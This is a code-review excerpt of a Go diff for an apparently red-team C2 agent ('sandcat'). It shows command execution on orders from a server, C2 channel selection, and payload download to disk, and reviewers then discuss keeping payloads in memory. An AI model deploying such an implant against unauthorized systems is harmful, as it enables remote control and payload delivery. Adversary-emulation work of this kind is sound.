agent/agent.go

```diff
@@ -0,0 +1,265 @@
+	timeout := int(command["timeout"].(float64))
+	result := make(map[string]interface{})
+	commandOutput, status, pid := execute.RunCommand(command["command"].(string), payloads, command["executor"].(string), timeout)
+	result["id"] = command["id"]
+	result["output"] = commandOutput
+	result["status"] = status
+	result["pid"] = pid
+ 	a.beaconContact.SendExecutionResults(a.GetTrimmedProfile(), result)
+}
+
+// Sets the C2 communication channels for the agent according to the specified C2 configuration map.
+// Will default to HTTP if requested C2 is not available or its requirements aren't met. If HTTP is
+// not available or if no communication channels are available, an error will be returned.
+func (a *Agent) SetCommunicationChannels(c2Config map[string]string) error {
+	var err error
+	if len(contact.CommunicationChannels) > 0 {
+		// Default C2 channel is HTTP
+		coms, ok := contact.CommunicationChannels["HTTP"]
+		if !ok {
+			err = errors.New("Default C2 channel HTTP not found.")
+		} else {
+			if c2Name, ok := c2Config["c2Name"]; ok {
+				if requestedComs, ok := contact.CommunicationChannels[c2Name]; ok {
+					if requestedComs.C2RequirementsMet(a.GetFullProfile(), c2Config) {
+						coms = requestedComs
+					} else {
+						output.VerbosePrint("[-] C2 requirements not met! Defaulting to HTTP")
+					}
+				} else {
+					output.VerbosePrint("[-] Requested C2 channel not found. Defaulting to HTTP")
+				}
+			} else {
+				output.VerbosePrint("[-] Invalid C2 Configuration. c2Name not specified. Defaulting to HTTP")
+			}
+			a.beaconContact = coms
+			a.heartbeatContact = coms
+			output.VerbosePrint("[*] Set communication channels for sandcat agent.")
+		}
+	} else {
+		err = errors.New("No possible communication channels found.")
+	}
+	return err
+}
+
+// Outputs information about the agent.
+func (a *Agent) Display() {
+	output.VerbosePrint(fmt.Sprintf("server=%s", a.server))
+	output.VerbosePrint(fmt.Sprintf("group=%s", a.group))
+	output.VerbosePrint(fmt.Sprintf("privilege=%s", a.privilege))
+	output.VerbosePrint(fmt.Sprintf("allow p2p receivers=%v", a.enableP2pReceivers))
+	output.VerbosePrint(fmt.Sprintf("beacon channel=%s", a.beaconContact.GetName()))
+	output.VerbosePrint(fmt.Sprintf("heartbeat channel=%s", a.heartbeatContact.GetName()))
+}
+
+// Will download each individual payload listed, write them to disk,
+// and will return the full file paths of each downloaded payload.
+func (a *Agent) DownloadPayloads(payloads []interface{}) []string {
+	var droppedPayloads []string
+	availablePayloads := reflect.ValueOf(payloads)
+	for i := 0; i < availablePayloads.Len(); i++ {
+		payload := availablePayloads.Index(i).Elem().String()
+		location := filepath.Join(payload)
+		obtainedPayload := false
+		if fileExists(location) == false {
+			output.VerbosePrint(fmt.Sprintf("[*] Fetching new payload bytes: %s", payload))
+			payloadBytes := a.beaconContact.GetPayloadBytes(a.GetTrimmedProfile(), payload)
+			if len(payloadBytes) > 0 {
```

Comment:
Make this function decide to either A) keep bytes in memory or B) download to disk.  Call two private functions to handle each of those situations.

Reply:
That should be based upon a flag that may or may not be provided from an incoming instruction beacon

Reply:
So should the return value be ([]string, map[string][]byte)? So when we're writing to disk, we'll populate the []string return value with the file paths (and also give a nil map), and when we're keeping in memory, the map will have the payload names as keys and the associated values will be the bytes?

Reply:
made a separate function `func (a *Agent) FetchPayloadBytes(payload string) []byte`